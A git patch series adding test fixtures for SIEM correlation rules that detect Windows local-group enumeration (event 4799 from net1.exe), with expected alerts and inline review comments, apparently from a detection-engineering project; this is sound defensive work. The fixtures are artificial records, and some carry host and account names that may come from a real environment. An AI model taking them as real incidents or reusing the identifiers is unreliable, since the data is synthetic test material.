+expect 1 {"action": "start", "alert.context": "administrator|", "alert.key": "net1.exe|ieuser", "category.generic": "Attack", "category.high": "Discovery", "category.low": "Account Discovery", "correlation_name": "Enumeration_Users_In_Groups", "correlation_type": "incident", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Enumeration_Users_In_Groups|msedgewin10|s-1-5-21-3461203602-4096304019-2269080069-1000", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "S-1-5-21-3461203602-4096304019-2269080069-500", "object.account.name": "administrator", "object.name": "administrator", "object.type": "local security-enabled", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1000", "subject.account.name": "ieuser", "subject.account.session_id": "189562", "subject.process.fullpath": "C:\\Windows\\System32\\net1.exe", "subject.process.id": "0x10b4", "subject.process.name": "net1.exe", "subject.process.path": "C:\\Windows\\System32\\"}
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_discovery/Enumeration_Users_In_Groups/tests/test_3.sc b/packages/windows_open_package/correlation_rules/mitre_attck_discovery/Enumeration_Users_In_Groups/tests/test_3.sc
new file mode 100644
index 00000000..d351f53e
--- /dev/null
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_discovery/Enumeration_Users_In_Groups/tests/test_3.sc
@@ -0,0 +1,4 @@
+{"action": "view", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4799\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"13826\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-05T09:25:03.8679616Z\"},\"EventRecordID\":\"10091\",\"Correlation\":{\"ActivityID\":\"{fdc063de-4b69-0000-5564-c0fd694bd501}\"},\"Execution\":{\"ProcessID\":\"620\",\"ThreadID\":\"1948\"},\"Channel\":\"Security\",\"Computer\":\"MSEDGEWIN10\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"Administrators\"},{\"Name\":\"TargetDomainName\",\"text\":\"Builtin\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-32-544\"},{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3461203602-4096304019-2269080069-1000\"},{\"Name\":\"SubjectUserName\",\"text\":\"IEUser\"},{\"Name\":\"SubjectDomainName\",\"text\":\"MSEDGEWIN10\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x2e47a\"},{\"Name\":\"CallerProcessId\",\"text\":\"0x5c0\"},{\"Name\":\"CallerProcessName\",\"text\":\"C:\\\\Windows\\\\System32\\\\net1.exe\"}]}}}", "category.generic": "Group", "category.high": "Users And Rights Management", "category.low": "Manipulation", "datafield1": "189562", "datafield2": "1472", "datafield3": "C:\\Windows\\System32\\net1.exe", "datafield4": "net1.exe", "event_src.category": "Operating system", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4799_Process_enumerates_members_of_security_enabled", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4799", "normalized": true, "object": "user_group", "object.id": "S-1-5-32-544", "object.name": "Administrators", "object.type": "local security-enabled", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-12T17:39:15.791Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1000", "subject.account.name": "ieuser", "subject.account.session_id": "189562", "subject.domain": "msedgewin10", "subject.id": "S-1-5-21-3461203602-4096304019-2269080069-1000", "subject.name": "ieuser", "subject.process.fullpath": "C:\\Windows\\System32\\net1.exe", "subject.process.id": "1472", "subject.process.name": "net1.exe", "subject.process.path": "C:\\Windows\\System32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-05T09:25:03.867Z", "type": "raw", "uuid": "53a0edb8-62ec-4480-9d52-6f6dab99c942"}
+
+# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь
+expect 1 {"action": "start", "alert.context": "Administrators|", "alert.key": "net1.exe|ieuser", "category.generic": "Attack", "category.high": "Discovery", "category.low": "Account Discovery", "correlation_name": "Enumeration_Users_In_Groups", "correlation_type": "incident", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Enumeration_Users_In_Groups|msedgewin10|s-1-5-21-3461203602-4096304019-2269080069-1000", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "process", "object.name": "Administrators", "object.type": "local security-enabled", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1000", "subject.account.name": "ieuser", "subject.account.session_id": "189562", "subject.process.fullpath": "C:\\Windows\\System32\\net1.exe", "subject.process.id": "1472", "subject.process.name": "net1.exe", "subject.process.path": "C:\\Windows\\System32\\"}
From f7d7c5255fe296af57bf34de47ffdce1114b2bbb Mon Sep 17 00:00:00 2001
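Review bot: The expectation pins `"subject.process.id": "1472"` and `"object.name": "Administrators"`, whereas the 4798 cases in test_1.sc and test_2.sc pin `"0x10b4"` and the lower-cased `"administrator"`; both differences are already present in the normalized input events (`datafield2` is hex for 4798 and decimal for 4799, and the group name keeps its case only for 4799), so they come from the normalizers, not from the rule. That couples this file to normalizer behaviour that has nothing to do with Enumeration_Users_In_Groups, and a later change there would surface as a rule regression. A comment before the `expect` line, `# process id and group-name case are taken from the 4799 normalizer output, not produced by the rule`, would make the coupling explicit for whoever has to update the expectation.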
From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Mon, 31 Jul 2023 14:06:17 +0300 Subject: [PATCH 31/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Local=5F?= =?UTF-8?q?Groups=5FEnumeration=5FDiscovery)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Local_Groups_Enumeration_Discovery/tests/test_1.sc | 4 ++++ .../Local_Groups_Enumeration_Discovery/tests/test_2.sc | 9 +++++++++ 2 files changed, 13 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_discovery/Local_Groups_Enumeration_Discovery/tests/test_1.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_discovery/Local_Groups_Enumeration_Discovery/tests/test_2.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_discovery/Local_Groups_Enumeration_Discovery/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_discovery/Local_Groups_Enumeration_Discovery/tests/test_1.sc new file mode 100644 index 00000000..32a595bb --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_discovery/Local_Groups_Enumeration_Discovery/tests/test_1.sc 
@@ -0,0 +1,4 @@
+{"action": "view", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4799\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"13826\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-01-24T11:52:02.1550291Z\"},\"EventRecordID\":\"3819707\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"724\",\"ThreadID\":\"10848\"},\"Channel\":\"Security\",\"Computer\":\"01566s-win16-ir.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"Administrators\"},{\"Name\":\"TargetDomainName\",\"text\":\"Builtin\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-32-544\"},{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-1105\"},{\"Name\":\"SubjectUserName\",\"text\":\"jbrown\"},{\"Name\":\"SubjectDomainName\",\"text\":\"3B\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x23ec715\"},{\"Name\":\"CallerProcessId\",\"text\":\"0x23e8\"},{\"Name\":\"CallerProcessName\",\"text\":\"C:\\\\Windows\\\\System32\\\\net1.exe\"}]}}}", "category.generic": "Group", "category.high": "Users And Rights Management", "category.low": "Manipulation", "datafield1": "37668629", "datafield2": "9192", "datafield3": "C:\\Windows\\System32\\net1.exe", "datafield4": "net1.exe", "event_src.category": "Operating system", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4799_Process_enumerates_members_of_security_enabled", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4799", "normalized": true, "object": "user_group", "object.id": "S-1-5-32-544", "object.name": "Administrators", "object.type": "local security-enabled", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-03T20:50:51.126Z", "status": "success", "subject": "account", "subject.account.domain": "3b", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-1105", "subject.account.name": "jbrown", "subject.account.session_id": "37668629", "subject.domain": "3b", "subject.id": "S-1-5-21-308926384-506822093-3341789130-1105", "subject.name": "jbrown", "subject.process.fullpath": "C:\\Windows\\System32\\net1.exe", "subject.process.id": "9192", "subject.process.name": "net1.exe", "subject.process.path": "C:\\Windows\\System32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-01-24T11:52:02.155Z", "type": "raw", "uuid": "f5e7e0ce-4a0d-455c-a500-699b039bcdbd"}
+
+# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь
+expect 1 {"action": "read", "alert.context": "3b\\jbrown enumed local group Administrators on 01566s-win16-ir.threebeesco.com", "alert.key": "Administrators", "category.generic": "Attack", "category.high": "Discovery", "category.low": "Account Discovery", "correlation_name": "Local_Groups_Enumeration_Discovery", "correlation_type": "event", "event_src.category": "Operating system", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "low", "object": "user_group", "object.name": "Administrators", "object.type": "local security-enabled", "status": "success", "subject": "account", "subject.account.domain": "3b", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-1105", "subject.account.name": "jbrown", "subject.account.session_id": "37668629", "subject.process.fullpath": "C:\\Windows\\System32\\net1.exe", "subject.process.id": "9192", "subject.process.name": "net1.exe", "subject.process.path": "C:\\Windows\\System32\\"}
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_discovery/Local_Groups_Enumeration_Discovery/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_discovery/Local_Groups_Enumeration_Discovery/tests/test_2.sc
new file mode 100644
index 00000000..3e79dc59
--- /dev/null
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_discovery/Local_Groups_Enumeration_Discovery/tests/test_2.sc
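Review bot: The fixture carries what looks like a real environment — host `01566s-win16-ir.threebeesco.com`, domain `3B`, account `jbrown` — while every other fixture in this series uses sanitized names (`example.corp`, `MSEDGEWIN10`, `IEUser`); unless this record is taken from a published sample set, rewrite the `Computer`, `event_src.*`, `dst.*`-style host fields and the subject domain/name to the same example values before it lands in a public package. The expected `alert.context` also pins the rule's literal message text, including the misspelling `enumed`; if the rule wording is ever corrected to `enumerated`, this expectation must change with it, so a comment next to the `expect` line, `# alert.context is the rule's literal message template, keep in sync with the rule`, would make that coupling visible (the rule itself is not in this diff).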
@@ -0,0 +1,9 @@ +{"action": "view", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4799\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"13826\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-01-24T11:52:02.1550291Z\"},\"EventRecordID\":\"3819707\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"724\",\"ThreadID\":\"10848\"},\"Channel\":\"Security\",\"Computer\":\"01566s-win16-ir.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"Administrators\"},{\"Name\":\"TargetDomainName\",\"text\":\"Builtin\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-32-544\"},{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-1105\"},{\"Name\":\"SubjectUserName\",\"text\":\"jbrown\"},{\"Name\":\"SubjectDomainName\",\"text\":\"3B\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x23ec715\"},{\"Name\":\"CallerProcessId\",\"text\":\"0x23e8\"},{\"Name\":\"CallerProcessName\",\"text\":\"C:\\\\Windows\\\\System32\\\\net1.exe\"}]}}}", "category.generic": "Group", "category.high": "Users And Rights Management", "category.low": "Manipulation", "datafield1": "37668629", "datafield2": "9192", "datafield3": "C:\\Windows\\System32\\net1.exe", "datafield4": "net1.exe", "event_src.category": "Operating system", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4799_Process_enumerates_members_of_security_enabled", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": 
"application/x-pt-eventlog", "msgid": "4799", "normalized": true, "object": "user_group", "object.id": "S-1-5-32-544", "object.name": "Administrators", "object.type": "local security-enabled", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-03T21:23:30.339Z", "status": "success", "subject": "account", "subject.account.domain": "3b", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-1105", "subject.account.name": "jbrown", "subject.account.session_id": "37668629", "subject.domain": "3b", "subject.id": "S-1-5-21-308926384-506822093-3341789130-1105", "subject.name": "jbrown", "subject.process.fullpath": "C:\\Windows\\System32\\net1.exe", "subject.process.id": "9192", "subject.process.name": "net1.exe", "subject.process.path": "C:\\Windows\\System32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-01-24T11:52:02.155Z", "type": "raw", "uuid": "ebbd935b-17e0-437a-b7d9-5e9a5cc2574f"} +{"action": "view", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4799\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"13826\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-01-24T11:53:14.3990509Z\"},\"EventRecordID\":\"3819735\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"724\",\"ThreadID\":\"2604\"},\"Channel\":\"Security\",\"Computer\":\"01566s-win16-ir.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"Administrators\"},{\"Name\":\"TargetDomainName\",\"text\":\"Builtin\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-32-544\"},{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-1105\"},{\"Name\":\"SubjectUserName\",\"text\":\"jbrown\"},{\"Name\":\"SubjectDomainName\",\"text\":\"3B\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x2be6273\"},{\"Name\":\"CallerProcessId\",\"text\":\"0x0\"},{\"Name\":\"CallerProcessName\",\"text\":\"-\"}]}}}", "category.generic": "Group", "category.high": "Users And Rights Management", "category.low": "Manipulation", "datafield1": "46031475", "datafield2": "0", "datafield3": "-", "datafield4": "-", "event_src.category": "Operating system", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4799_Process_enumerates_members_of_security_enabled", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4799", "normalized": true, "object": "user_group", "object.id": "S-1-5-32-544", "object.name": 
"Administrators", "object.type": "local security-enabled", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-03T21:23:30.339Z", "status": "success", "subject": "account", "subject.account.domain": "3b", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-1105", "subject.account.name": "jbrown", "subject.account.session_id": "46031475", "subject.domain": "3b", "subject.id": "S-1-5-21-308926384-506822093-3341789130-1105", "subject.name": "jbrown", "subject.process.fullpath": "-", "subject.process.id": "0", "subject.process.name": "-", "subject.process.path": "", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-01-24T11:53:14.399Z", "type": "raw", "uuid": "7845c35f-2cd9-4d34-8d17-3716eda09c4e"} +{"action": "view", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4799\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"13826\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-01-24T11:54:02.4164913Z\"},\"EventRecordID\":\"3819752\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"724\",\"ThreadID\":\"2604\"},\"Channel\":\"Security\",\"Computer\":\"01566s-win16-ir.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"Administrators\"},{\"Name\":\"TargetDomainName\",\"text\":\"Builtin\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-32-544\"},{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-1105\"},{\"Name\":\"SubjectUserName\",\"text\":\"jbrown\"},{\"Name\":\"SubjectDomainName\",\"text\":\"3B\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x2bf470d\"},{\"Name\":\"CallerProcessId\",\"text\":\"0x0\"},{\"Name\":\"CallerProcessName\",\"text\":\"-\"}]}}}", "category.generic": "Group", "category.high": 
"Users And Rights Management", "category.low": "Manipulation", "datafield1": "46089997", "datafield2": "0", "datafield3": "-", "datafield4": "-", "event_src.category": "Operating system", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4799_Process_enumerates_members_of_security_enabled", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4799", "normalized": true, "object": "user_group", "object.id": "S-1-5-32-544", "object.name": "Administrators", "object.type": "local security-enabled", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-03T21:23:30.339Z", "status": "success", "subject": "account", "subject.account.domain": "3b", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-1105", "subject.account.name": "jbrown", "subject.account.session_id": "46089997", "subject.domain": "3b", "subject.id": "S-1-5-21-308926384-506822093-3341789130-1105", "subject.name": "jbrown", "subject.process.fullpath": "-", "subject.process.id": "0", "subject.process.name": "-", "subject.process.path": "", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-01-24T11:54:02.416Z", "type": "raw", "uuid": "9dc13012-355d-48a2-bbf4-0f48346b9fe5"} +{"action": "view", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4799\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"13826\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-01-24T11:54:18.0016387Z\"},\"EventRecordID\":\"3819771\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"724\",\"ThreadID\":\"2604\"},\"Channel\":\"Security\",\"Computer\":\"01566s-win16-ir.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"Remote Desktop Users\"},{\"Name\":\"TargetDomainName\",\"text\":\"Builtin\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-32-555\"},{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-1105\"},{\"Name\":\"SubjectUserName\",\"text\":\"jbrown\"},{\"Name\":\"SubjectDomainName\",\"text\":\"3B\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x2bfa357\"},{\"Name\":\"CallerProcessId\",\"text\":\"0x0\"},{\"Name\":\"CallerProcessName\",\"text\":\"-\"}]}}}", "category.generic": "Group", "category.high": "Users And Rights Management", "category.low": "Manipulation", "datafield1": "46113623", "datafield2": "0", "datafield3": "-", "datafield4": "-", "event_src.category": "Operating system", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4799_Process_enumerates_members_of_security_enabled", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4799", "normalized": true, "object": "user_group", "object.id": "S-1-5-32-555", "object.name": 
"Remote Desktop Users", "object.type": "local security-enabled", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-03T21:23:30.339Z", "status": "success", "subject": "account", "subject.account.domain": "3b", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-1105", "subject.account.name": "jbrown", "subject.account.session_id": "46113623", "subject.domain": "3b", "subject.id": "S-1-5-21-308926384-506822093-3341789130-1105", "subject.name": "jbrown", "subject.process.fullpath": "-", "subject.process.id": "0", "subject.process.name": "-", "subject.process.path": "", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-01-24T11:54:18.001Z", "type": "raw", "uuid": "708ada5b-c2df-409a-8736-a5e015251801"} +{"action": "view", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4799\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"13826\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-01-24T11:54:42.8999934Z\"},\"EventRecordID\":\"3819788\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"724\",\"ThreadID\":\"10940\"},\"Channel\":\"Security\",\"Computer\":\"01566s-win16-ir.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"Users\"},{\"Name\":\"TargetDomainName\",\"text\":\"Builtin\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-32-545\"},{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-1105\"},{\"Name\":\"SubjectUserName\",\"text\":\"jbrown\"},{\"Name\":\"SubjectDomainName\",\"text\":\"3B\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x2c00357\"},{\"Name\":\"CallerProcessId\",\"text\":\"0x0\"},{\"Name\":\"CallerProcessName\",\"text\":\"-\"}]}}}", "category.generic": "Group", "category.high": 
"Users And Rights Management", "category.low": "Manipulation", "datafield1": "46138199", "datafield2": "0", "datafield3": "-", "datafield4": "-", "event_src.category": "Operating system", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4799_Process_enumerates_members_of_security_enabled", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4799", "normalized": true, "object": "user_group", "object.id": "S-1-5-32-545", "object.name": "Users", "object.type": "local security-enabled", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-03T21:23:30.339Z", "status": "success", "subject": "account", "subject.account.domain": "3b", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-1105", "subject.account.name": "jbrown", "subject.account.session_id": "46138199", "subject.domain": "3b", "subject.id": "S-1-5-21-308926384-506822093-3341789130-1105", "subject.name": "jbrown", "subject.process.fullpath": "-", "subject.process.id": "0", "subject.process.name": "-", "subject.process.path": "", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-01-24T11:54:42.899Z", "type": "raw", "uuid": "dd71f5fe-1c97-429e-975d-ed21c6198fb1"} + +# Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 5 {"action": "read", "category.generic": "Attack", "category.high": "Discovery", "category.low": "Account Discovery", "correlation_name": "Local_Groups_Enumeration_Discovery", "correlation_type": "event", "event_src.category": "Operating system", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "low", "object": "user_group", "object.type": "local security-enabled", "status": "success", "subject": "account", "subject.account.domain": "3b", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-1105", "subject.account.name": "jbrown"} + \ No newline at end of file From 7e76d8db63015ad50e37069f8687aa91d800b5d8 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Tue, 1 Aug 2023 10:20:28 +0300 Subject: [PATCH 32/57] =?UTF-8?q?=D0=A0=D0=B0=D1=81=D1=88=D0=B8=D1=80?= =?UTF-8?q?=D0=B8=D0=BB=20=D0=BF=D0=BE=D0=BB=D1=8F=20=D0=B4=D0=B0=D0=BD?= =?UTF-8?q?=D0=BD=D1=8B=D1=85=20=D0=BA=D0=BE=D1=82=D0=BE=D1=80=D1=8B=D0=B5?= =?UTF-8?q?=20=D0=BC=D1=8B=20=D0=BE=D0=B6=D0=B8=D0=B4=D0=B0=D0=B5=D0=BC=20?= =?UTF-8?q?=D0=B4=D0=BB=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0?= =?UTF-8?q?=20(Detect=5Fexecution=5Fimageload=5Fwuauclt=5Flolbas)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Detect_execution_imageload_wuauclt_lolbas/tests/test_1.sc | 4 ++-- .../Detect_execution_imageload_wuauclt_lolbas/tests/test_2.sc | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) 
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_execution/Detect_execution_imageload_wuauclt_lolbas/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_execution/Detect_execution_imageload_wuauclt_lolbas/tests/test_1.sc
